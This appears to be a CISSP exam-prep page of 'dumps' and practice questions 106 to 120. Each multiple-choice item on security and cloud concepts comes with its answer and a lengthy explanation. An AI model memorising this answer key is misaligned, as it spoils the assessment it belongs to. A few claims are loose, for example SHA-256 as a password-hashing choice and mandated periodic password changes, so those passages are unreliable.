ISC CISSP Certified Information Systems Security Professional Exam Dumps and Practice Test Questions Set 8 Q106-120

ISC CISSP Certified Information Systems Security Professional Exam Dumps and Practice Test Questions Set 8 Q106-120

Visit here for our full ISC CISSP exam dumps and practice test questions.

Question 106:

 Which principle limits access rights to the minimum necessary for users to perform their job functions?

A) Need-to-Know
B) Least Privilege
C) Separation of Duties
D) Defense in Depth

Answer: B

Explanation:

The principle of Least Privilege is a foundational security concept in information security and system administration. It dictates that users, programs, and processes should be granted only the permissions necessary to perform their assigned tasks and no more. By applying this principle, organizations minimize the potential for misuse, accidental changes, or exploitation by malicious actors. Unlike Need-to-Know, which limits access to information but does not necessarily limit system-level permissions, Least Privilege ensures that all access rights are tightly controlled. This principle also differs from Separation of Duties, which distributes tasks among multiple users to reduce fraud, and Defense in Depth, which relies on multiple layers of security but is not specifically focused on access restriction.

Implementing Least Privilege involves careful planning, role-based access control, and regular reviews of user permissions. Role-based access control assigns permissions according to job roles rather than individuals, reducing the administrative burden of managing each user separately. Additionally, organizations must ensure that users are not granted unnecessary administrative privileges and that temporary elevated access is closely monitored and removed when no longer required. The reduction of privileges directly limits the attack surface, ensuring that even if an account is compromised, the potential damage is restricted to the permissions of that account.

From a compliance standpoint, adhering to the Least Privilege principle is critical for regulatory frameworks such as GDPR, HIPAA, and PCI DSS, which require controlled access to sensitive information. Least Privilege also strengthens defense against insider threats, a major concern in organizational security, by preventing users from accessing information or systems unrelated to their duties. Furthermore, it is essential in implementing secure software and network architecture because it ensures that processes and applications operate only within their designated permissions, reducing the likelihood of privilege escalation attacks.

In practice, Least Privilege requires continuous monitoring and auditing. Privilege creep, where users accumulate unnecessary permissions over time, must be actively prevented. Automated tools can help by providing alerts when permissions exceed the role requirements. Logging and auditing systems are critical to identify and correct deviations from the principle. Overall, Least Privilege is not just a technical control but a strategic approach to minimizing risk in a security-conscious organization.

The security principle that limits access to the minimum necessary for job functions is therefore Least Privilege, making it the correct answer. Implementing this principle reduces risk, strengthens compliance, and limits potential damage from accidental or malicious actions.

Question 107:

 Which type of cloud service provides customers with fully managed applications without managing the underlying infrastructure?

A) Infrastructure as a Service
B) Platform as a Service
C) Software as a Service
D) Function as a Service

Answer: C

Explanation:

Software as a Service, or SaaS, is a cloud computing model that delivers fully managed software applications over the internet. In the SaaS model, the service provider is responsible for managing the underlying infrastructure, including servers, storage, networking, operating systems, and application updates. This allows organizations and end-users to access applications through web browsers or dedicated clients without having to worry about deployment, maintenance, or technical operations. SaaS stands in contrast to Infrastructure as a Service, which provides virtualized computing resources but requires the customer to manage the operating system and applications, and Platform as a Service, which provides a runtime environment to deploy applications but still involves some level of application management. Function as a Service is another model that allows execution of event-driven code but focuses on small, stateless functions rather than complete applications.

SaaS provides significant benefits in terms of scalability, cost-efficiency, and user accessibility. Customers can quickly provision accounts and use applications without investing in hardware or IT staff. SaaS solutions typically include automatic updates, security patches, and backup management, relieving organizations of operational burdens. Examples include email services like Microsoft 365, customer relationship management systems such as Salesforce, and collaboration tools like Slack or Google Workspace. The SaaS model supports multi-tenancy, where multiple customers share the same infrastructure while maintaining data isolation, which helps optimize resource utilization.

From a security perspective, SaaS providers implement access controls, encryption, and monitoring to protect user data. Security responsibilities are shared, with the provider ensuring platform security and the customer managing account-level controls, such as strong passwords and access permissions. SaaS also supports remote work environments by allowing employees to access applications from anywhere, increasing flexibility and productivity while minimizing infrastructure management requirements. Organizations adopting SaaS can focus on business outcomes rather than technical upkeep, allowing IT teams to concentrate on strategic initiatives instead of routine maintenance.

The cloud model delivering fully managed applications without requiring customers to manage the infrastructure is Software as a Service, making it the correct answer. SaaS continues to grow in popularity due to its convenience, flexibility, and reduced operational overhead.

Question 108:

 Which cryptographic attack uses precomputed hash-value pairs to reverse hashed passwords efficiently?

A) Brute-Force Attack
B) Rainbow Table Attack
C) Man-in-the-Middle Attack
D) Replay Attack

Answer: B

Explanation:

A Rainbow Table Attack is a cryptographic attack that uses precomputed tables of hash-value pairs to efficiently reverse hashed passwords. Unlike a brute-force attack, which systematically attempts all possible combinations of characters, a rainbow table leverages precomputed hashes to quickly find the original plaintext corresponding to a given hash. This dramatically reduces the time required to crack passwords, especially those that are unsalted and commonly used. Rainbow tables are particularly effective against systems that store passwords in hash form without additional security measures, such as salting. Salting involves appending unique random data to each password before hashing, which ensures that identical passwords generate different hash outputs and renders rainbow tables ineffective.

The concept behind rainbow tables involves the creation of a large dataset containing hashes for many possible password combinations. When an attacker captures a hashed password from a compromised system, they can search the precomputed table for a match. If a match is found, the original password is revealed immediately. This attack highlights the importance of secure password storage practices, including using strong, unique passwords and cryptographic hashing algorithms with salting mechanisms. Modern best practices also include key stretching techniques, such as PBKDF2, bcrypt, or Argon2, which further slow down hash computation and thwart attacks.

Rainbow table attacks differ significantly from Man-in-the-Middle attacks, which intercept communication, and Replay attacks, which reuse captured messages. They are also distinct from brute-force attacks, which attempt every possible combination sequentially. What sets rainbow table attacks apart is their reliance on precomputed tables of hash-value pairs, which map potential plaintext passwords to their corresponding hash outputs. By referencing these tables, an attacker can rapidly reverse a hashed password without needing to compute each hash individually in real time. This makes rainbow table attacks far more efficient than traditional brute-force methods, especially against weak or commonly used passwords.

The effectiveness of rainbow tables is contingent upon the lack of additional protective measures, such as password salting. Salting involves adding a unique, random string to each password before hashing, which produces a distinct hash even for identical passwords. This invalidates precomputed rainbow tables, as the same password combined with different salts results in completely different hash outputs. Therefore, proper use of salting dramatically reduces the feasibility of rainbow table attacks. Organizations must implement not only salting but also strong cryptographic hash functions, such as SHA-256 or bcrypt, which are resistant to collision and computationally expensive to reverse, further increasing attack difficulty.

Rainbow table attacks exploit the deterministic nature of hash functions. Without additional defenses, any identical password will always produce the same hash, making it a prime target for attackers using these precomputed datasets. Users who reuse passwords across multiple accounts increase their risk exponentially, as one compromised hash can lead to widespread account compromises. Implementing multi-factor authentication adds a layer of defense because, even if a password is revealed through a rainbow table attack, access still requires a second authentication factor, such as a hardware token, biometric verification, or one-time password.

Other mitigation strategies include enforcing strong password policies, requiring long and complex passwords with mixed characters, numbers, and symbols, and mandating regular password changes. Password managers can help users maintain unique, high-entropy passwords without the burden of memorization. Additionally, organizations should monitor for signs of credential compromise, such as unusual login attempts or access patterns, and employ intrusion detection systems to detect unauthorized access attempts that may result from rainbow table attacks.

Overall, the cryptographic attack that efficiently reverses hashed passwords using precomputed hash-value pairs is the Rainbow Table Attack, making it the correct answer. Understanding this attack underscores the importance of robust password storage practices, salting, hashing, multi-factor authentication, and user education. By combining these defensive measures, organizations can significantly reduce the likelihood and impact of successful rainbow table attacks, strengthening their overall cybersecurity posture. Awareness and proactive mitigation are key because, without proper safeguards, even sophisticated hashing mechanisms can become vulnerable to this highly optimized form of password attack.

Question 109:

 Which process ensures a system can be restored quickly after a disaster or outage?

A) Business Continuity Planning
B) Disaster Recovery Planning
C) Risk Assessment
D) Incident Response

Answer: B

Explanation:

Disaster Recovery Planning (DRP) is the structured process focused on restoring IT systems, applications, and data after a disaster or major outage. While Business Continuity Planning ensures that critical operations continue during disruptions, DRP specifically addresses how technology infrastructure is recovered to minimize downtime and data loss. DRP identifies recovery strategies, prioritizes critical systems, and defines recovery objectives such as Recovery Time Objective (RTO) and Recovery Point Objective (RPO). It also includes provisions for backup procedures, alternate sites, hardware redundancy, and software recovery to ensure that business-critical operations resume as quickly as possible.

A robust DRP includes preparation, testing, and continuous improvement. Preparation involves identifying potential risks, critical systems, and dependencies. Testing ensures that recovery strategies work effectively under real conditions. Regular updates to the DRP account for changes in the IT environment, new technologies, and evolving threats. Disaster Recovery Planning is critical for organizational resilience, especially in sectors where system downtime can result in financial loss, reputational damage, or regulatory non-compliance, such as banking, healthcare, and e-commerce. DRP also aligns with cybersecurity strategies by mitigating the effects of ransomware, hardware failures, or accidental data deletion.

Incident Response focuses on handling active security incidents, while Risk Assessment identifies potential threats but does not provide structured recovery procedures. Disaster Recovery Planning, by contrast, establishes the framework to restore full functionality efficiently, allowing the organization to maintain operational continuity and service delivery.

The process that ensures rapid system restoration after disruptions is therefore Disaster Recovery Planning, making it the correct answer. A well-implemented DRP reduces downtime, limits operational impact, and supports overall business resilience.

Question 110:

 Which type of social engineering attack convinces users to reveal confidential information via fake communications?

A) Tailgating
B) Phishing
C) Shoulder Surfing
D) Dumpster Diving

Answer: B

Explanation:

Phishing is a social engineering attack that manipulates individuals into revealing sensitive information through deceptive communications such as emails, text messages, or fake websites. Unlike Tailgating, which exploits physical access, Shoulder Surfing, which observes confidential information directly, or Dumpster Diving, which recovers discarded sensitive materials, phishing targets the human element by exploiting trust, curiosity, fear, or urgency. Phishing attacks often impersonate trusted entities such as banks, employers, or service providers, crafting messages that appear legitimate and prompt immediate action.

Successful phishing attacks can result in credential theft, financial loss, or unauthorized access to systems. Advanced phishing techniques, such as spear-phishing or whaling, target specific individuals or high-profile executives, increasing the likelihood of success. Mitigating phishing risks involves a combination of technical and procedural controls. Technical measures include email filters, spam detection, secure web gateways, and multi-factor authentication. Procedural measures focus on user education and awareness, teaching individuals to recognize suspicious emails, verify sender authenticity, and avoid sharing confidential information without proper validation. Organizations often conduct simulated phishing campaigns to train employees and assess the effectiveness of awareness programs.

Phishing remains one of the leading causes of data breaches globally because it targets human behavior rather than system vulnerabilities. Attackers exploit trust, curiosity, urgency, or fear to manipulate users into disclosing sensitive information such as login credentials, personal identification numbers, or financial data. Phishing campaigns can take many forms, including deceptive emails, fraudulent websites, instant messages, or even phone calls that appear legitimate. Because these attacks exploit psychological tendencies, they are often highly effective even against well-protected technical environments.

A successful defense against phishing requires a multi-layered approach combining technological safeguards, organizational policies, and user awareness. Email filtering and spam detection systems help identify and block malicious messages before they reach users, but these tools cannot eliminate risk. Security-conscious organizational culture is crucial, emphasizing the importance of verifying sources, recognizing red flags, and reporting suspicious activity promptly. Continuous security training and simulated phishing exercises are effective ways to educate employees and test their awareness in realistic scenarios. Over time, these measures cultivate a workforce that is vigilant and capable of identifying phishing attempts before sensitive information is disclosed.

Technical defenses against phishing include multi-factor authentication, which ensures that even if credentials are compromised, additional verification is required for account access. Web browser protections and security certificates can also help users distinguish between legitimate and fraudulent sites. Organizations may implement policies requiring secure password practices, unique credentials per account, and immediate reporting protocols for suspected compromises. Monitoring for unusual account activity provides an additional layer of detection, allowing security teams to respond quickly to potential phishing incidents.

Phishing is not limited to corporate environments; individuals face similar risks through personal email, social media, and mobile messaging platforms. Attackers often craft messages tailored to the recipient, making them appear authentic and highly convincing. Advanced phishing campaigns, known as spear-phishing, target specific individuals or departments, increasing the likelihood of success. Business Email Compromise (BEC) attacks exploit organizational hierarchies to authorize fraudulent transactions, emphasizing that phishing can have severe financial and reputational consequences.

The social engineering attack that tricks users into revealing confidential information is therefore phishing, making it the correct answer. Understanding phishing highlights the interplay between human factors and cybersecurity, demonstrating that even robust technical controls can be circumvented by manipulative tactics. Effective mitigation reduces exposure to cyber threats, financial loss, and data compromise, reinforcing the need for continuous vigilance, comprehensive training programs, and layered security measures. By combining technological safeguards with human awareness, organizations and individuals can significantly reduce the risk posed by phishing attacks, ensuring stronger overall resilience against cybercrime.

Question 111:

 Which disaster recovery site has all hardware and software ready for immediate use?

A) Cold Site
B) Warm Site
C) Hot Site
D) Backup Site

Answer: C

Explanation:

A Hot Site is a disaster recovery facility that is fully equipped with hardware, software, network connectivity, and data backup, ready for immediate operation. It contrasts with Cold Sites, which provide only space and utilities, and Warm Sites, which provide partial infrastructure requiring setup before operations can resume. Backup Sites focus primarily on storing data and may not include operational hardware or network infrastructure.

Hot Sites are crucial for organizations requiring minimal downtime and uninterrupted service delivery, such as financial institutions, healthcare providers, or e-commerce platforms. They support critical applications, provide real-time or near-real-time data replication, and allow employees to continue operations with little to no disruption. Hot Sites are expensive to maintain due to the continuous need for updated infrastructure, replication of production systems, and regular testing to ensure readiness.

The advantage of a Hot Site lies in its ability to ensure high availability and business continuity during disasters, such as natural events, hardware failures, cyberattacks, or power outages. Testing and regular maintenance are required to guarantee that the Hot Site mirrors production systems and can handle operational loads. Hot Sites are often part of a broader disaster recovery strategy, working alongside Backup Sites and Cold/Warm Sites to provide layered protection.

The disaster recovery site that is ready for immediate operations is therefore a Hot Site, making it the correct answer. Its implementation ensures organizations can sustain operations without significant disruption, protecting revenue, customer trust, and regulatory compliance.

Question 112:

 Which security control type identifies incidents after they occur?

A) Preventive
B) Detective
C) Corrective
D) Deterrent

Answer: B

Explanation:

Detective controls are security mechanisms designed to identify and report incidents after they occur. Unlike preventive controls, which aim to stop incidents before they happen, or corrective controls, which restore systems after incidents, detective controls provide monitoring, alerting, and auditing capabilities that allow organizations to detect suspicious activity, policy violations, or security breaches. Examples of detective controls include intrusion detection systems (IDS), security information and event management (SIEM) solutions, audit logs, monitoring tools, and anomaly detection systems.

Detective controls play a critical role in an organization’s security posture by providing visibility into ongoing operations and enabling a timely response to incidents. They allow security teams to analyze patterns, investigate events, and identify potential breaches or misuse of systems. Detective controls also support compliance with regulatory requirements by maintaining records of security events and providing evidence for audits or investigations.

While detective controls do not prevent incidents directly, they complement preventive and corrective measures by ensuring that incidents are noticed and addressed promptly. The implementation of detective controls involves defining monitoring criteria, establishing alerting thresholds, and ensuring that logs and alerts are regularly reviewed. Automated solutions can assist by correlating events, detecting anomalies, and reducing response times.

The control type designed to identify incidents post-occurrence is therefore Detective, making it the correct answer. Effective use of detective controls strengthens an organization’s security posture, enables proactive response, and ensures accountability and compliance.

Question 113:

 Which malware type hides its presence and maintains privileged access on a system?

A) Virus
B) Trojan
C) Worm
D) Rootkit

Answer: D

Explanation:

A Rootkit is a sophisticated type of malware specifically designed to conceal its presence while providing attackers with persistent, privileged access to an infected system. Unlike viruses, which attach to files and execute when the host file runs, or worms, which self-replicate and spread across networks without user intervention, rootkits operate stealthily and at a low system level, often integrating with the operating system’s kernel or bootloader. This enables them to evade conventional antivirus and security detection mechanisms, making them exceptionally difficult to identify and remove. Trojans, on the other hand, rely on deception to trick users into executing them, but do not inherently hide themselves in the same persistent and privileged manner as rootkits.

Rootkits compromise system integrity by intercepting and modifying standard operating system calls, hiding processes, files, or network connections associated with malicious activities. This concealment allows attackers to deploy additional malware, steal sensitive information, manipulate system operations, or maintain backdoor access without triggering alerts. Kernel-level rootkits are particularly dangerous because they operate at the core of the operating system, granting complete control over system resources. User-mode rootkits, while slightly less sophisticated, can still manipulate applications and system utilities to obscure their presence. The persistence and stealth of rootkits make them a significant threat in enterprise and personal computing environments.

Detection and removal of rootkits typically require advanced forensic techniques. Since they can bypass standard security tools, identifying a rootkit often involves analyzing system behavior for anomalies, using specialized scanning software, or performing offline analysis from a clean environment. In severe cases, the only guaranteed method of removal may involve fully reformatting the system and reinstalling the operating system to ensure all traces of the rootkit are eradicated.

Rootkits highlight the critical importance of proactive security measures, including continuous monitoring, system hardening, software patching, and user education. Network segmentation and least privilege access policies can help limit the spread and impact of rootkits if they do manage to infiltrate a system. Additionally, behavioral monitoring solutions and integrity verification mechanisms can identify unusual patterns in system files or processes that may indicate rootkit activity.

The malware type that hides itself and maintains privileged access is therefore the Rootkit, making it the correct answer. Understanding rootkits is essential for cybersecurity professionals, as they represent one of the most insidious forms of malware due to their ability to evade detection, maintain control, and facilitate subsequent attacks.

Question 114:

 Which cryptographic method ensures the integrity of a message?

A) Symmetric Encryption
B) Digital Signature
C) Hashing
D) Asymmetric Encryption

Answer: C

Explanation:

Hashing is a cryptographic method designed to ensure the integrity of data by producing a fixed-length digest from an input message. The key characteristic of a hash function is that any change in the input, even a single character, produces a significantly different hash output. This property allows users and systems to detect alterations or tampering with data. Unlike symmetric or asymmetric encryption, which primarily focus on confidentiality by transforming data into unreadable formats for unauthorized users, hashing focuses on verifying that the message or data has not been modified during transmission or storage. Digital signatures also ensure integrity and authenticity, but they rely on underlying hash functions to create the digest before signing, meaning hashing is the fundamental mechanism for integrity verification.

Hash functions are widely used in a variety of applications beyond cryptography. They are employed in password storage, where hashed passwords are stored instead of plaintext to reduce the risk of exposure. Hashing is also used in data verification, where the hash of transmitted files is compared against the original to confirm that no alterations occurred. Algorithms like SHA-256, SHA-3, and BLAKE2 are considered secure because they are resistant to collisions, meaning it is computationally infeasible to find two different inputs that produce the same hash output.

Hashing is an essential element in maintaining the integrity of digital communications. For example, in software distribution, a hash value can be published alongside the software package. Users can generate a hash of the downloaded package and compare it to the provided hash value. If the two hashes match, the file is considered intact; any mismatch indicates potential tampering. This method ensures that the integrity of the software has not been compromised by malware or corruption during download.

While encryption transforms the content to maintain confidentiality, hashing creates a unique fingerprint to detect unauthorized changes. Even highly secure encryption cannot inherently detect if the ciphertext has been altered; this is why integrity checks rely on hashing. Combining hashing with digital signatures or message authentication codes further strengthens security by verifying both authenticity and integrity.

The cryptographic method that ensures message integrity is therefore hashing, making it the correct answer. Hashing is a cornerstone of secure communication, data validation, and system trust, forming the basis of many security protocols and practices in modern computing.

Question 115:

 Which risk response strategy involves accepting a risk without taking action to mitigate it?

A) Mitigation
B) Acceptance
C) Transfer
D) Avoidance

Answer: B

Explanation:

Risk Acceptance is a strategy where an organization acknowledges a particular risk but chooses to tolerate it without taking any proactive measures to reduce its likelihood or impact. This approach is generally applied when the risk is minor, the probability of occurrence is low, or the cost of mitigation exceeds the potential loss. Unlike Mitigation, which actively reduces risk through technical, procedural, or operational measures, or Transfer, which shifts the responsibility of risk to a third party such as an insurer, Acceptance involves no immediate action. Avoidance, by contrast, eliminates risk by changing or discontinuing the associated activity.

Accepting a risk does not mean ignoring it. Organizations employing this strategy monitor the risk closely and prepare contingency plans should it materialize. Risk acceptance is a calculated decision, often based on cost-benefit analysis, risk prioritization, and strategic considerations. For instance, a company may accept the risk of minor downtime in a non-critical application rather than investing significant resources to prevent it, focusing instead on critical systems that directly impact revenue or customer satisfaction.

Risk acceptance is an integral part of comprehensive risk management frameworks. It allows organizations to allocate resources efficiently by concentrating efforts on mitigating high-priority threats. Documenting accepted risks is essential for accountability and audit purposes, providing a clear rationale for why no action was taken and demonstrating awareness of potential impacts. Additionally, acceptance often coexists with monitoring strategies, where the organization continuously evaluates the environment and adjusts its approach if risk conditions change.

By acknowledging risks rather than attempting to eliminate every threat, organizations can achieve a balanced approach to security, operational efficiency, and resource allocation. Risk acceptance is particularly relevant in dynamic environments where threats evolve rapidly, and mitigation may not always be cost-effective or technically feasible.

The risk response strategy that tolerates a risk without immediate action is therefore Acceptance, making it the correct answer. Risk acceptance is a practical, calculated, and strategic approach that complements other risk management strategies, ensuring organizations focus on critical threats while maintaining operational efficiency.

Question 116:

 Which security design principle states that a system should include multiple layers of defense?

A) Least Privilege
B) Open Design
C) Defense in Depth
D) Separation of Duties

Answer: C

Explanation:

Defense in Depth is a core security principle advocating the implementation of multiple layers of defense to protect information systems. The idea is to create overlapping security controls, both technical and administrative, so that if one layer fails, others continue to provide protection. This approach enhances the overall security posture of an organization by mitigating single points of failure and increasing the effort required by an attacker to compromise the system. Defense in Depth is distinct from other principles: Least Privilege focuses on minimizing access rights, Open Design emphasizes security that does not rely on secrecy, and Separation of Duties reduces fraud by distributing responsibilities.

In practice, Defense in Depth involves integrating physical security, technical controls, and administrative policies. Physical controls might include locks, surveillance cameras, and access badges. Technical measures encompass firewalls, intrusion detection systems, antivirus software, network segmentation, encryption, and secure configurations. Administrative controls cover policies, procedures, awareness training, and incident response plans. By layering these controls, organizations can create a comprehensive defense strategy that addresses both external and internal threats.

The layered approach provides redundancy. For example, if a firewall is bypassed, intrusion detection systems can alert administrators to suspicious activity. If malware infects an endpoint, antivirus software, network monitoring, and access controls collectively limit damage. Defense in Depth also promotes resilience by considering multiple threat vectors, including social engineering, insider threats, technical exploits, and environmental hazards.

Implementing Defense in Depth requires careful planning, risk assessment, and continuous evaluation. Organizations must identify critical assets, prioritize security investments, and ensure that overlapping layers complement rather than interfere with each other. Regular testing, audits, and incident simulations help validate the effectiveness of the layers and identify weaknesses.

The security principle emphasizing multiple defensive layers is therefore Defense in Depth, making it the correct answer. It provides a holistic approach to security, reduces single points of failure, and strengthens overall organizational resilience against a broad spectrum of threats.

Question 117:

 Which type of backup copies all data and resets the archive bit?

A) Full Backup
B) Differential Backup
C) Incremental Backup
D) Synthetic Full Backup

Answer: A

Explanation:

A Full Backup is a type of data backup in which all files and directories are copied in their entirety from a source system to a storage medium. One defining characteristic of a Full Backup is that it resets the archive bit of each file after the backup is completed. The archive bit is a file attribute that indicates whether a file has been modified since the last backup. Resetting it ensures that subsequent backups, such as incremental or differential, can correctly identify files that have changed and need to be backed up again. Full backups provide a complete snapshot of the system at a specific point in time, making them critical for disaster recovery scenarios.

Differential backups only copy files that have changed since the last full backup and do not reset the archive bit, while incremental backups copy only files that have changed since the last backup of any type and reset the archive bit. Synthetic Full Backups combine previous backups to create a full backup without reading all original files again, reducing storage and processing time, but the resulting backup depends on the previous backup history rather than originating from all files at once.

Full Backups are essential for ensuring comprehensive data protection. They simplify recovery because a single backup contains all the necessary files, eliminating the need to restore multiple incremental or differential backups sequentially. However, Full Backups require more storage space and time compared to incremental or differential backups. Organizations often use a combination of backup strategies: Full Backups on a regular schedule, with incremental or differential backups performed more frequently to reduce storage and backup windows while maintaining recovery capabilities.

The backup type that copies all data and resets the archive bit is therefore a Full Backup, making it the correct answer. Full Backups form the cornerstone of any reliable data protection strategy, ensuring completeness and simplifying restoration.

Question 118:

 Which type of malware replicates by attaching itself to executable files?

A) Worm
B) Virus
C) Trojan
D) Spyware

Answer: B

Explanation:

A Virus is a type of malware specifically designed to replicate by attaching itself to executable files, documents, or other code. Unlike worms, which propagate independently over networks, or trojans, which rely on social engineering for execution, viruses require user interaction to activate and spread. Spyware, in contrast, focuses on gathering information without replication. Viruses often exploit the fact that users may unknowingly execute infected files, enabling the virus to embed itself into other files and systems. This replication mechanism allows viruses to spread gradually, sometimes across networks, removable media, or shared storage, causing widespread damage or disruption.

The behavior of a virus typically involves three stages: infection, activation, and replication. During infection, the virus embeds itself into a host file or application. Once the host is executed, the virus becomes active, executing its malicious payload. Depending on the type of virus, the payload may perform harmful actions such as corrupting data, stealing sensitive information, or installing additional malware. Finally, replication occurs when the virus attaches itself to other executable files or spreads through networks, emails, or shared drives. Some sophisticated viruses include polymorphic or metamorphic code that changes with each infection to evade detection by antivirus software.

Virus prevention relies heavily on user education, up-to-date antivirus software, and secure coding practices. Users should avoid opening unknown attachments, downloading files from untrusted sources, or executing software from questionable origins. Organizations implement endpoint protection, firewalls, and email filtering to limit virus spread and detect infections early. Additionally, regular patching and system updates reduce vulnerabilities that viruses can exploit to gain a foothold on systems.

Understanding the behavior of viruses is critical for both cybersecurity professionals and everyday users. Unlike worms that self-replicate automatically, viruses require a vector, which often involves human actions. This makes awareness and training key components in preventing viral infections. Combined with robust detection tools, backups, and incident response plans, organizations can minimize the impact of virus infections and recover effectively if they occur.

The malware type that attaches to files to replicate is therefore a Virus, making it the correct answer. Viruses represent a foundational concept in malware and remain relevant in modern cybersecurity discussions due to their persistence, ability to propagate, and potential to deliver destructive payloads. Recognizing viruses, understanding their replication mechanisms, and implementing comprehensive defense measures are crucial for maintaining the integrity and security of computing environments.

Question 119:

 Which attack targets web applications by injecting malicious scripts into user inputs?

A) SQL Injection
B) Cross-Site Scripting
C) Man-in-the-Middle
D) Brute-Force

Answer: B

Explanation:

Cross-Site Scripting (XSS) is a type of web application attack where malicious scripts are injected into user input fields or web pages, subsequently executed in the browsers of other users. Unlike SQL Injection, which targets databases directly, XSS exploits the client-side of a web application, enabling attackers to manipulate content, steal session cookies, or redirect users to malicious sites. Man-in-the-Middle attacks intercept communications between two parties, and Brute-Force attacks attempt to guess credentials through repeated trials, but neither involves script injection into web applications.

XSS attacks typically occur when web applications fail to validate or sanitize user input properly. Attackers can embed JavaScript, HTML, or other executable code within input fields, comments, or URL parameters. When other users access the compromised content, the malicious scripts execute within their browsers, allowing attackers to hijack sessions, capture sensitive information, manipulate content, or spread malware. XSS attacks are categorized into several types: stored (persistent), reflected, and DOM-based. Stored XSS occurs when malicious scripts are permanently saved on the server and served to users, reflected XSS happens when input is echoed back immediately without sanitization, and DOM-based XSS manipulates the Document Object Model on the client side without server involvement.

Preventing XSS requires implementing multiple layers of defense. Input validation and output encoding are crucial to ensure that user-submitted data cannot execute as code. Content Security Policies (CSP) restrict the sources from which scripts can execute, reducing the likelihood of exploitation. Web developers should also avoid using unsafe APIs and frameworks that do not automatically escape or sanitize user input. Security testing, code reviews, and penetration testing help identify vulnerabilities before attackers can exploit them.

XSS attacks are particularly dangerous because they exploit trust between users and web applications. Attackers can impersonate users, steal authentication tokens, or inject fraudulent content into web pages. Education for developers and security awareness programs for organizations complement technical defenses by highlighting the importance of secure coding practices. Browser security features, such as same-origin policies, also limit the potential damage from XSS by isolating scripts to specific domains.

The web application attack that injects scripts into user inputs is therefore Cross-Site Scripting, making it the correct answer. Understanding XSS is critical for web developers, system administrators, and security professionals, as it remains a common and potent attack vector in modern web applications. Proper mitigation reduces data theft, session hijacking, and compromise of user trust.

Question 120:

 Which type of cloud service allows users to run code without managing servers?

A) Infrastructure as a Service
B) Platform as a Service
C) Software as a Service
D) Function as a Service

Answer: D

Explanation:

Function as a Service (FaaS) is a cloud computing model that allows users to deploy and execute code without managing any underlying servers, operating systems, or infrastructure. This serverless model abstracts the entire infrastructure layer, enabling developers to focus solely on the code that performs specific functions in response to events, such as HTTP requests, database updates, or messaging queues. Unlike Infrastructure as a Service (IaaS), where users manage virtual machines, operating systems, and applications, or Platform as a Service (PaaS), which handles runtime environments but still requires some deployment configuration, FaaS completely offloads infrastructure management to the cloud provider. Software as a Service (SaaS) delivers fully managed applications, but it does not allow users to deploy custom code directly.

FaaS platforms automatically scale functions based on demand, ensuring optimal resource utilization and cost efficiency. Users are typically billed based on execution time and resource usage rather than pre-provisioned infrastructure, reducing operational costs. Functions are stateless, meaning they do not persist data between executions, which promotes modularity and supports microservices architectures. This model is particularly well-suited for event-driven applications, automation scripts, real-time processing, and API-driven workflows. Providers like AWS Lambda, Azure Functions, and Google Cloud Functions exemplify FaaS platforms that facilitate rapid deployment and maintenance-free code execution.

Security in FaaS environments shifts responsibility to the provider for the underlying infrastructure, runtime, and patching. Users focus on secure coding practices, including input validation, authentication, and data handling. Serverless applications benefit from automatic updates and isolation between functions, but developers must consider vulnerabilities related to third-party libraries, function chaining, and event triggers. Monitoring and logging functions are critical for detecting anomalies and performance issues, as traditional infrastructure-level monitoring is abstracted away.

The FaaS model supports agility, rapid prototyping, and microservices adoption. Organizations can release new features faster, respond to changing demands, and minimize overhead associated with server management. However, FaaS requires careful design regarding cold starts, resource limits, and stateless function management to ensure performance and reliability. Best practices include breaking applications into discrete, event-driven functions, securing function triggers, and implementing retry or error handling mechanisms to ensure resilience.

The cloud service model that allows execution of code without managing servers is therefore Function as a Service, making it the correct answer. FaaS represents the evolution of serverless computing, offering developers and organizations a highly efficient, scalable, and cost-effective method to deploy applications while offloading infrastructure responsibilities to cloud providers.